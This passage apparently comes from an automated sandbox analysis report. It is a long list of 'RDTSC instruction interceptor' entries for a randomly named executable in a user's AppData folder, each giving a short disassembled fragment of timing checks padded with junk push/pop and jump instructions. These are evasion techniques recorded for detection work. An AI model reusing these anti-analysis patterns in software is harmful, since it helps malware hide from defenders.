Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 4C50BC8 second address: 4C50BCE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 4C50BCE second address: 4C50BD2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 4C50BD2 second address: 4C50C36 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esp 0x00000009 pushad 0x0000000a pushfd 0x0000000b jmp 00007FBC9118B8AEh 0x00000010 and ecx, 46A38A48h 0x00000016 jmp 00007FBC9118B8ABh 0x0000001b popfd 0x0000001c mov dx, si 0x0000001f popad 0x00000020 mov dword ptr [esp], ebp 0x00000023 pushad 0x00000024 movzx eax, dx 0x00000027 pushfd 0x00000028 jmp 00007FBC9118B8ADh 0x0000002d and si, 1766h 0x00000032 jmp 00007FBC9118B8B1h 0x00000037 popfd 0x00000038 popad 0x00000039 mov ebp, esp 0x0000003b push eax 0x0000003c push edx 0x0000003d push eax 0x0000003e push edx 0x0000003f pushad 0x00000040 popad 0x00000041 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 4C50C36 second address: 4C50C49 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBC912593FFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 4C50C49 second address: 4C50C4F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 4C90641 second address: 4C90645 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 4C90645 second address: 4C9065B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push ebx 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b mov ebx, 1DDBB546h 0x00000010 mov ebx, 248DDFD2h 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 4C9065B second address: 4C90661 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 4C90661 second address: 4C9068C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], ebp 0x0000000b jmp 00007FBC9118B8AEh 0x00000010 mov ebp, esp 0x00000012 pushad 0x00000013 pushad 0x00000014 mov dx, si 0x00000017 mov ecx, 6B2965DFh 0x0000001c popad 0x0000001d pushad 0x0000001e pushad 0x0000001f popad 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 4C30135 second address: 4C3013A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 4C3013A second address: 4C30174 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov cx, di 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push esi 0x0000000b jmp 00007FBC9118B8B0h 0x00000010 mov dword ptr [esp], ebp 0x00000013 pushad 0x00000014 movzx esi, bx 0x00000017 popad 0x00000018 mov ebp, esp 0x0000001a push eax 0x0000001b push edx 0x0000001c pushad 0x0000001d call 00007FBC9118B8AEh 0x00000022 pop esi 0x00000023 mov bh, 7Fh 0x00000025 popad 0x00000026 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 4C30174 second address: 4C30190 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FBC91259408h 0x00000009 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 4C30190 second address: 4C301A1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push dword ptr [ebp+04h] 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 4C301A1 second address: 4C301A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 4C301A5 second address: 4C301AB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 4C301AB second address: 4C301C3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBC912593FBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push dword ptr [ebp+0Ch] 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 4C301C3 second address: 4C301DE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBC9118B8B7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 4C508EB second address: 4C508EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 4C508EF second address: 4C508F5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 4C508F5 second address: 4C508FB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 4C508FB second address: 4C508FF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 4C508FF second address: 4C5090E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 4C5090E second address: 4C50912 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 4C50912 second address: 4C50918 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 4C50918 second address: 4C5092C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movzx eax, di 0x00000006 movsx edi, ax 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov ebp, esp 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 mov dx, si 0x00000014 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 4C5092C second address: 4C5094F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov ebx, esi 0x00000008 popad 0x00000009 pop ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FBC91259407h 0x00000011 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 4C5094F second address: 4C50955 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 4C5052B second address: 4C5052F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 4C5052F second address: 4C50535 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 4C50535 second address: 4C5054E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBC912593FCh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d movsx ebx, ax 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 4C5054E second address: 4C50553 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 4C50553 second address: 4C50559 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 4C50559 second address: 4C5055D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 4C50431 second address: 4C50451 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBC912593FDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FBC912593FCh 0x00000011 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 4C50451 second address: 4C50456 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 4C50456 second address: 4C504A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 call 00007FBC91259407h 0x00000009 pop ecx 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d xchg eax, ebp 0x0000000e pushad 0x0000000f mov cl, dl 0x00000011 popad 0x00000012 mov ebp, esp 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 mov ch, dl 0x00000019 pushfd 0x0000001a jmp 00007FBC912593FEh 0x0000001f add ax, 3DD8h 0x00000024 jmp 00007FBC912593FBh 0x00000029 popfd 0x0000002a popad 0x0000002b rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 4C504A2 second address: 4C504BA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FBC9118B8B4h 0x00000009 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 4C504BA second address: 4C504BE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 4C50202 second address: 4C50215 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBC9118B8AFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 4C50215 second address: 4C50265 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov di, 039Ah 0x00000007 mov si, di 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e jmp 00007FBC912593FAh 0x00000013 mov dword ptr [esp], ebp 0x00000016 pushad 0x00000017 call 00007FBC912593FEh 0x0000001c call 00007FBC91259402h 0x00000021 pop ecx 0x00000022 pop edi 0x00000023 movzx eax, dx 0x00000026 popad 0x00000027 mov ebp, esp 0x00000029 pushad 0x0000002a movsx ebx, ax 0x0000002d popad 0x0000002e pop ebp 0x0000002f push eax 0x00000030 push edx 0x00000031 push eax 0x00000032 push edx 0x00000033 push eax 0x00000034 push edx 0x00000035 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 4C50265 second address: 4C50269 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 4C50269 second address: 4C5026F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 4C50E83 second address: 4C50E87 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 4C50E87 second address: 4C50EA2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBC91259407h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 4C50EA2 second address: 4C50EBA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FBC9118B8B4h 0x00000009 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 4C50EBA second address: 4C50EBE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 4C50EBE second address: 4C50F46 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esi 0x00000009 jmp 00007FBC9118B8ACh 0x0000000e mov dword ptr [esp], ebp 0x00000011 pushad 0x00000012 mov ax, AD2Dh 0x00000016 jmp 00007FBC9118B8AAh 0x0000001b popad 0x0000001c mov ebp, esp 0x0000001e pushad 0x0000001f call 00007FBC9118B8AEh 0x00000024 call 00007FBC9118B8B2h 0x00000029 pop ecx 0x0000002a pop edx 0x0000002b pushfd 0x0000002c jmp 00007FBC9118B8B0h 0x00000031 sub cx, 1F58h 0x00000036 jmp 00007FBC9118B8ABh 0x0000003b popfd 0x0000003c popad 0x0000003d pop ebp 0x0000003e push eax 0x0000003f push edx 0x00000040 jmp 00007FBC9118B8B5h 0x00000045 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 4C50F46 second address: 4C50F4C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 4C50F4C second address: 4C50F50 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 4C9060B second address: 4C90623 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FBC91259404h 0x00000009 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 4C7002E second address: 4C7004F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBC9118B8ADh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FBC9118B8ADh 0x00000011 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 4C7004F second address: 4C70077 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBC91259401h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d call 00007FBC912593FAh 0x00000012 pop eax 0x00000013 movsx ebx, si 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 4C70077 second address: 4C700B2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBC9118B8ADh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007FBC9118B8AEh 0x0000000f mov ebp, esp 0x00000011 jmp 00007FBC9118B8B0h 0x00000016 mov eax, dword ptr [ebp+08h] 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d pushad 0x0000001e popad 0x0000001f rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 4C700B2 second address: 4C700B8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 4C700B8 second address: 4C700F0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bl, al 0x00000005 mov ch, bl 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a and dword ptr [eax], 00000000h 0x0000000d jmp 00007FBC9118B8B6h 0x00000012 and dword ptr [eax+04h], 00000000h 0x00000016 pushad 0x00000017 call 00007FBC9118B8AEh 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 4C50375 second address: 4C50384 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBC912593FBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 4C50384 second address: 4C5038A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 4C5038A second address: 4C5038E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 4C60B13 second address: 4C60B17 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 4C60B17 second address: 4C60B1B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 4C60B1B second address: 4C60B21 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 4C60B21 second address: 4C60B30 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FBC912593FBh 0x00000009 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 4C60B30 second address: 4C60B34 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 4C60B34 second address: 4C60B43 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 4C60B43 second address: 4C60B47 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 4C60B47 second address: 4C60B4D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 4C60D3E second address: 4C60D6C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBC9118B8B9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b mov ecx, 462CE853h 0x00000010 popad 0x00000011 push eax 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 push ecx 0x00000016 pop edx 0x00000017 mov ebx, eax 0x00000019 popad 0x0000001a rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 4C60D6C second address: 4C60DBC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushfd 0x00000006 jmp 00007FBC912593FBh 0x0000000b add cx, 3BEEh 0x00000010 jmp 00007FBC91259409h 0x00000015 popfd 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 xchg eax, ebp 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e jmp 00007FBC91259408h 0x00000023 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 4C60DBC second address: 4C60DCB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBC9118B8ABh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 4C60DCB second address: 4C60DF9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBC91259409h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b pushad 0x0000000c mov di, cx 0x0000000f movzx eax, bx 0x00000012 popad 0x00000013 pop ebp 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 popad 0x0000001a rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 4C60DF9 second address: 4C60E15 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBC9118B8B8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 4C80DD3 second address: 4C80DD9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 4C80DD9 second address: 4C80DDD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 4C80DDD second address: 4C80E27 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ecx 0x00000009 jmp 00007FBC91259400h 0x0000000e mov dword ptr [esp], ebp 0x00000011 jmp 00007FBC91259400h 0x00000016 mov ebp, esp 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b jmp 00007FBC91259408h 0x00000020 popad 0x00000021 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 4C80E27 second address: 4C80E2D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 4C80E2D second address: 4C80E31 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 4C80E31 second address: 4C80E40 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ecx 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 4C80E40 second address: 4C80E46 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 4C80E46 second address: 4C80E63 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FBC9118B8B9h 0x00000009 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 4C80E63 second address: 4C80EC3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBC91259401h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp], ecx 0x0000000e jmp 00007FBC912593FEh 0x00000013 mov eax, dword ptr [76FA65FCh] 0x00000018 jmp 00007FBC91259400h 0x0000001d test eax, eax 0x0000001f jmp 00007FBC91259400h 0x00000024 je 00007FBD034FBEAAh 0x0000002a push eax 0x0000002b push edx 0x0000002c pushad 0x0000002d mov bx, AC20h 0x00000031 mov ax, di 0x00000034 popad 0x00000035 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 4C9000E second address: 4C9004E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 call 00007FBC9118B8B7h 0x0000000a pop eax 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push ecx 0x0000000f pushad 0x00000010 mov ebx, eax 0x00000012 popad 0x00000013 mov dword ptr [esp], ebp 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007FBC9118B8B6h 0x0000001d rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 4C9004E second address: 4C90062 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dx, 3A44h 0x00000007 mov eax, edx 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov ebp, esp 0x0000000e pushad 0x0000000f mov eax, edx 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 4C90062 second address: 4C9009B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007FBC9118B8ADh 0x0000000a add al, 00000036h 0x0000000d jmp 00007FBC9118B8B1h 0x00000012 popfd 0x00000013 popad 0x00000014 popad 0x00000015 pop ebp 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007FBC9118B8ADh 0x0000001d rdtsc
